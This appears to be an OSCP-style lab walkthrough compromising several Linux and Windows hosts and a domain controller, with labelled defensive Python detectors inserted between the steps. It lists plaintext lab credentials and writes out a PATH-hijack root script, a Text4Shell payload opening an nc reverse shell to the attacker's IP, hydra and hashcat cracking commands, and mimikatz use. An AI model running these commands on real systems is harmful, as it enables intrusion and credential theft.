OSCP B

Network

Given:

  • 192.168.145.147 MS01
  • 192.168.145.149
  • 192.168.145.150
  • 192.168.145.151

Found:

  • 10.10.105.146 DC01
  • 10.10.105.148 MS02

Creds

eric.wallows:EricLikesRunning800 (given creds for 192.168.145.147)
web_svc:Diamond1
sql_svc:Dolphin1
Administrator:December31 (local admin on MS01)

other users:

Network Enumeration

192.168.145.149

Enumeration

Performing a UDP scan reveals SNMP.

Initial Access

Walking the SNMP tree with snmpwalk, including the extended objects.

We discover the user kiero with a default password. We'll use Hydra with the -e nsr option to try the same password as the username, null, or reversed.

hydra ftp://192.168.188.149 -l kiero -P /usr/share/wordlists/rockyou.txt.gz -e nsr

And we get kiero:kiero.

Testing FTP access:

Download the keys and inspect them.

The public key mentions the user john, so we'll try SSH.

Privilege Escalation

Get the local flag.

RESET_PASSWD has the SUID bit set. Download the program and analyze it with strings.

We observe that it calls chpasswd without an absolute path.

This allows a PATH hijack: place a malicious program with the same name in /tmp and put /tmp first in the PATH.

Create a simple script at /tmp/chpasswd and make it executable:

echo 'echo "root:kiero" | /usr/sbin/chpasswd' > /tmp/chpasswd
chmod +x /tmp/chpasswd

Prepend /tmp to John's PATH and execute RESET_PASSWD:

export PATH=/tmp:$PATH
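An added illustration, not part of this writeup, of why the relative chpasswd call in RESET_PASSWD is exploitable and which PATH entries a SUID program must never search. The directory modes and file list are a constructed model, not the lab machine:

```python
import os
import stat
from typing import Callable, Dict, List, Optional

def resolve_like_execvp(cmd: str, path: str, exists: Callable[[str], bool]) -> Optional[str]:
    """First PATH entry holding cmd wins, which is how a bare system("chpasswd") resolves."""
    if "/" in cmd:                       # absolute or relative path: no PATH search at all
        return cmd if exists(cmd) else None
    for entry in path.split(":"):
        candidate = os.path.join(entry or ".", cmd)   # an empty entry means the current directory
        if exists(candidate):
            return candidate
    return None

def untrusted_path_entries(path: str, stat_fn: Callable[[str], os.stat_result]) -> List[str]:
    """PATH entries a privileged program must not search: relative ones, or directories
    that are not root-owned or are group/world writable (sticky /tmp still counts)."""
    findings = []
    for entry in path.split(":"):
        if not entry.startswith("/"):
            findings.append(entry or "<empty>")
            continue
        try:
            st = stat_fn(entry)
        except FileNotFoundError:
            continue
        if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(entry)
    return findings

# Constructed model of the target filesystem instead of touching the real one.
def _dir(mode: int, uid: int) -> os.stat_result:
    return os.stat_result((stat.S_IFDIR | mode, 0, 0, 1, uid, 0, 4096, 0, 0, 0))

FAKE_DIRS: Dict[str, os.stat_result] = {
    "/tmp": _dir(0o1777, 0),             # world-writable, sticky: anyone can plant a file
    "/usr/sbin": _dir(0o755, 0),         # root-owned, not writable by others
    "/home/john/bin": _dir(0o755, 1000)  # owned by an unprivileged user
}
FAKE_FILES = {"/usr/sbin/chpasswd", "/tmp/chpasswd"}   # the planted copy lives in /tmp

def fake_stat(p: str) -> os.stat_result:
    if p not in FAKE_DIRS:
        raise FileNotFoundError(p)
    return FAKE_DIRS[p]

def audit(cmd: str, path: str) -> Dict[str, object]:
    """What the relative call would actually run, and which PATH entries made that possible."""
    return {"resolved": resolve_like_execvp(cmd, path, FAKE_FILES.__contains__),
            "untrusted": untrusted_path_entries(path, fake_stat)}
```

The fix on the binary side is the absolute path plus a sanitized PATH before any system() or execvp() call; the audit shows that with /tmp in front, the planted copy is the one that runs.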

Post Exploitation

192.168.145.150

Enumeration

A webpage on port 8080 shows that there is an API running.

Using feroxbuster, we find /search and /CHANGELOG.

Initial Access

Searching for vulnerabilities in Apache Commons Text 1.8, we find Text4Shell (CVE-2022-42889).

https://github.com/sunnyvale-it/CVE-2022-42889-PoC

Submitting ${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc 192.168.45.229 443 -e sh')} (URL-encoded with CyberChef) to the search function gives us a shell.
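As an added defensive example that is not part of this writeup, a log check for the interpolation prefixes Text4Shell abuses (script, dns, url), decoding the query string repeatedly so double-encoded payloads are still caught. The access-log lines and the /search endpoint format are constructed assumptions:

```python
import re
from typing import Iterable, Iterator, List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Default interpolators in Commons Text 1.5 to 1.9 that reach code execution
# or data exfiltration (CVE-2022-42889); matched after URL decoding.
_LOOKUP = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)

def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so a double-encoded payload does not slip past."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_lookups(request_target: str) -> List[Tuple[str, str]]:
    """Return (parameter, prefix) pairs whose decoded value contains a dangerous lookup."""
    hits = []
    for name, raw in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        m = _LOOKUP.search(decode_fully(raw))
        if m:
            hits.append((name, m.group(1).lower()))
    return hits

# Combined-log style lines; assumes '<ip> ... "<METHOD> <target> HTTP/x.y"'.
_REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_access_log(lines: Iterable[str]) -> Iterator[Tuple[str, str, str]]:
    """Yield (client_ip, parameter, prefix) for every flagged request."""
    for line in lines:
        m = _REQUEST.match(line)
        if m:
            for param, prefix in find_lookups(m.group(2)):
                yield (m.group(1), param, prefix)

# Constructed sample log: one benign search, one plain-encoded script lookup
# (a harmless 1+1 expression) and one double-encoded dns lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?query=apache HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /search?query=%24%7Bscript%3Ajavascript%3A1%2B1%7D HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search?query=%2524%257Bdns%253Aaddress%253Aexample.org%257D HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious lookup:", hit)
```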

Privilege Escalation

Get the flag

In /opt, we find the project and an App.java file. This app opens a socket on port 5000.

Using ss, we see port 8000 listening internally.

Using ps aux, we observe that the port belongs to a Java debugging (JDWP) listener.

Transfer chisel and create a tunnel to access the port.

We use jdwp-shellifier https://github.com/IOActive/jdwp-shellifier.

In the jdwp-shellifier command, we set the SUID bit on /bin/bash so that it runs as root. The debugger waits for the breakpoint to be hit, so we connect to port 5000 with nc to trigger it.

Then, as the dev user, we verify the result.
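An added defensive check, not from this writeup, that finds JVMs started with a JDWP agent in ps aux output and classifies how reachable the debug port is. The ps aux lines are constructed; even a loopback-only listener is a local privilege escalation path when the JVM runs as root, as on this host:

```python
import re
from typing import Dict, Iterable, List, Optional, Tuple

# The two JVM spellings that start the debug wire protocol; 'address=' decides reachability.
_JDWP = re.compile(r"(?:-agentlib:jdwp=|-Xrunjdwp:)(\S+)")

def parse_jdwp_options(cmdline: str) -> Optional[Dict[str, str]]:
    m = _JDWP.search(cmdline)
    if not m:
        return None
    opts = {}
    for item in m.group(1).split(","):
        key, _, val = item.partition("=")
        opts[key] = val
    return opts

def jdwp_exposure(cmdline: str) -> Optional[str]:
    """None when no JDWP agent; otherwise how widely the debug port is reachable."""
    opts = parse_jdwp_options(cmdline)
    if opts is None:
        return None
    if opts.get("server", "n") != "y":
        return "client"        # dials out to a debugger, opens no listener
    host, _, _port = opts.get("address", "").rpartition(":")
    if host in ("localhost", "127.0.0.1", "::1", "[::1]"):
        return "loopback"      # still a local privilege escalation path if the JVM is root
    if host in ("*", "0.0.0.0", "::", "[::]"):
        return "all-interfaces"
    if host == "":
        return "port-only"     # JDK 9+: loopback only; JDK 8 and older: every interface
    return "network"

def scan_ps_aux(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """(user, pid, exposure) for every listening JDWP agent found in ps aux output."""
    findings = []
    for line in lines:
        cols = line.split(None, 10)    # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        if len(cols) < 11 or cols[0] == "USER":
            continue
        exposure = jdwp_exposure(cols[10])
        if exposure not in (None, "client"):
            findings.append((cols[0], cols[1], exposure))
    return findings

# Constructed ps aux sample: a root JVM debuggable on a bare port, one bound everywhere, one clean.
SAMPLE_PS = [
    "root         1  0.0  0.1 168000  11000 ?  Ss   10:00   0:01 /sbin/init",
    "root       812  0.3  5.2 2600000 210000 ? Sl   10:01   0:12 /usr/bin/java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000 -jar /opt/app.jar",
    "dev       1301  0.1  2.0 2400000  80000 ?  Sl   10:02   0:03 /usr/bin/java -Xrunjdwp:transport=dt_socket,server=y,address=*:5005 -jar /opt/other.jar",
    "dev       1402  0.0  1.0 2300000  60000 ?  Sl   10:03   0:00 /usr/bin/java -jar /opt/prod.jar",
]
```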

Post Exploitation

192.168.145.151

Enumeration

Initial Access

The HTTP server yields nothing, so we search for an exploit for the freeswitch-event service on port 8021.

We can use a PowerShell reverse shell.

And we get a shell.

Privilege Escalation

Get the local flag

Chris has SeImpersonatePrivilege.

Transfer JuicyPotatoNG to the machine, create a reverse shell with msfvenom, and listen on port 8888.

Post Exploitation

192.168.145.147

Enumeration

Initial Access

Use the provided credentials to SSH into the machine.

Privilege Escalation

Transfer adPEAS.

Transfer chisel, create a tunnel, and retrieve Kerberoastable user hashes.

hashcat -m 13100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --force

Cracking them gives web_svc:Diamond1 and sql_svc:Dolphin1.
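An added detection-side example, not part of this writeup: the service ticket requests behind a Kerberoast show up on the DC as event 4769 with RC4 encryption (0x17, the ticket type hashcat mode 13100 cracks), usually as a burst against several SPN accounts. The events below are constructed, with the account and service names taken from this lab:

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

# Constructed 4769 events (Kerberos service ticket requested) reduced to the fields that matter.
# TicketEncryptionType 0x17 is RC4-HMAC, the ticket type hashcat -m 13100 cracks; 0x12 is AES256.
SAMPLE_4769: List[Dict[str, str]] = [
    {"time": "2024-01-01T10:00:00", "account": "eric.wallows@OSCP.EXAM", "service": "web_svc", "etype": "0x17"},
    {"time": "2024-01-01T10:00:01", "account": "eric.wallows@OSCP.EXAM", "service": "sql_svc", "etype": "0x17"},
    {"time": "2024-01-01T10:00:01", "account": "eric.wallows@OSCP.EXAM", "service": "krbtgt", "etype": "0x12"},
    {"time": "2024-01-01T10:05:00", "account": "MS02$@OSCP.EXAM", "service": "DC01$", "etype": "0x17"},
    {"time": "2024-01-01T11:00:00", "account": "cheyanne.adams@OSCP.EXAM", "service": "sql_svc", "etype": "0x12"},
]

def is_roast_candidate(ev: Dict[str, str]) -> bool:
    """RC4 ticket for a user-style SPN account; computer accounts and krbtgt are noise here."""
    service = ev["service"]
    return (ev["etype"].lower() == "0x17"
            and not service.endswith("$")
            and service.lower() != "krbtgt")

def kerberoast_bursts(events: Iterable[Dict[str, str]], window_seconds: int = 60,
                      min_services: int = 2) -> List[Tuple[str, List[str]]]:
    """Requesters that pulled RC4 tickets for >= min_services distinct service accounts
    inside one window. A single RC4 ticket can be legitimate (an account without AES
    enabled); a burst across many SPNs within seconds matches Kerberoasting tools."""
    by_account: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            by_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    alerts = []
    window = timedelta(seconds=window_seconds)
    for account, reqs in by_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                alerts.append((account, sorted(services)))
                break
    return alerts
```

Enabling AES on the service accounts and using long random passwords removes the cheap RC4 ticket this whole step depends on.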

User eric has SeImpersonatePrivilege, so we transfer PrintSpoofer.

Post Exploitation

Transfer mimikatz to the host.

sekurlsa::logonpasswords

Crack the recovered hashes with hashcat.

Start an SSH tunnel to scan and work in the internal network.

Performing a ping sweep reveals the third machine.

10.10.105.148

Enumeration

Initial Access

Using sql_svc:Dolphin1, we connect to MSSQL on MS02.

proxychains -q impacket-mssqlclient 'oscp.exam/sql_svc:Dolphin1@10.10.105.148' -windows-auth

Privilege Escalation

On the pivot, transfer nc.exe and start a listener, then launch a PowerShell reverse shell from within MSSQL.

We notice a windows.old directory, so we retrieve the SAM and SYSTEM hives from it.

Transfer them to the pivot via SMB share.

mkdir tests
New-SmbShare -Name "tests" -Path "C:\tests" -FullAccess "Everyone"

Create an SMB share on Kali and copy them again.

Using secretsdump, we retrieve the hashes for MS02.


10.10.105.146 DC

Enumeration

Initial Access

Using the tom_admin hash obtained on MS02, we access the DC with evil-winrm.

Privilege Escalation

As tom_admin is privileged, we perform a DCSync attack to retrieve all the hashes.

Use the Administrator hash to access the DC via WinRM.

Post Exploitation

Get the proof